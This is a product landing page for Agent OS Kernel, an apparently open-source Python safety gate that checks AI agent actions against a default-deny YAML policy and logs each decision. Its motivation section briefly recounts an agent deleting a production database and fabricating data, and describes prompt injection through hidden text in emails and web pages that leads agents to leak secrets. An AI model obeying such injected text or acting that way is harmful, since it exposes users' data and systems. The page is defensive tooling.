Agent OS Kernel GitHub
v0.4.3 - PyPI package

If your AI assistant tries to delete the production database, who stops it?

Agent OS Kernel is a safety gate for AI agents. Every action gets checked first, executed only if allowed, and recorded either way.

Watch one get blocked I'm a developer ->
Decision overhead
Negligible
Test coverage
96%
Built-in providers
4
Why this is urgent

AI agents are doing more dangerous things than you think.

A helpful assistant can still be fooled, rushed, or mistaken. The gate is the checkpoint between a suggestion and a real-world action.

One command, entire production database gone

A Replit AI agent deleted a company's production database, wiping executive records and company data, then fabricated replacement data.

Replit / SaaStr incident, July 2025

A hidden message in your inbox steals your secrets

Instructions hidden inside comments, emails, or pages can convince an assistant to send secrets to an attacker-controlled URL.

OWASP LLM01: Prompt Injection

A single web page can hijack a browser agent

A booby-trapped page can tell a browser agent to forward codes, visit a risky endpoint, or take actions the user never asked for.

Brave Browser security research, 2025
See how Kernel blocks these ->
Try it yourself

Click once. Watch the gate stop the AI.

Pick a risky situation, press Run, and watch each action move through the safety gate before anything reaches the real world.

Demo ready.
Pick a scenario

Timeline

Ready

    Gate decision

    Idle
    Action
    -
    Target
    -
    Reason
    Ready - click Run to start.

    Audit log

    append-only
    Ready - no decisions recorded yet.
    Want it for real? Install or open the demo README.
    How it works

    Three steps, always in the same order.

    Think of it like airport security for AI actions: check the rules, let approved actions through, and keep a record of every decision.

    1

    Check

    Match the requested action against the rules you wrote. Is this allowed?

    YAML policy match, glob resource patterns, blocked unless explicitly allowed.
    2

    Execute

    If the action is allowed, the gate hands it to the tool that does the real work.

    One provider runs the action: filesystem, HTTP, process, or MCP.
    3

    Record

    Whether the action ran or was blocked, one log line is written for later review.

    Append-only JSONL with record_id, status, duration, target, and error.
    Watch it run

    A guided replay for people who would rather watch.

    The video is lazy-loaded, narrated, captioned, and safe to watch muted.

    For developers

    Show technical details.

    Three invariants, a five-line example, nine core features, architecture diagram, and benchmarks.

    All access through Gate

    kernel.submit() is the only execution path. ToolDef is metadata-only.

    Default deny

    Actions not explicitly allowed in the YAML policy are blocked. Resource glob patterns keep the policy expressive.

    No silent actions

    Every decision produces one audit record with action, target, status, duration, and error.

    hello_kernel.py 
    from agent_os_kernel import Kernel, ActionRequest
from agent_os_kernel.providers.filesystem import FilesystemProvider

with Kernel("policy.yaml", [FilesystemProvider()], "kernel.log") as kernel:
    ok = kernel.submit(ActionRequest(action="fs.read", target="/workspace/data.csv"))
    denied = kernel.submit(ActionRequest(action="fs.read", target="/etc/passwd"))

print(ok.status, denied.status)
    Agent OS Kernel architecture: AgentLoop to kernel submit to policy, provider, and audit

    Structural Gate

    The public execution path is intentionally small.

    YAML policy

    Allow-list with glob matching and constraints.

    Append-only audit

    Tamper-evident JSONL for each decision.

    One-click rollback

    Snapshot-and-restore for reversible writes.

    4 built-in providers

    Filesystem, process, HTTP, and MCP.

    100+ LLM providers

    LiteLLM routing for OpenAI, Anthropic, Ollama, Azure, and more.

    CLI

    submit · log · validate-policy · version

    High throughput

    77,000+ ops/s. p99 < 0.1 ms.

    Auditable core

    Small enough to read end to end.

    Install

    One pip away.

    Not a coder, just looking around? The Try It section above does it without installing anything.

    Want to wire it into your own project? Python 3.10+. Zero runtime dependencies in the kernel core. Works with any LiteLLM-compatible provider.

    PyPI Docs 30 Examples
    pip
    pip install py-agent-kernel
    uv
    uv add py-agent-kernel
    from source
    git clone https://github.com/JiahaoZhang-Public/agent-kernel.git
cd agent-kernel && pip install -e .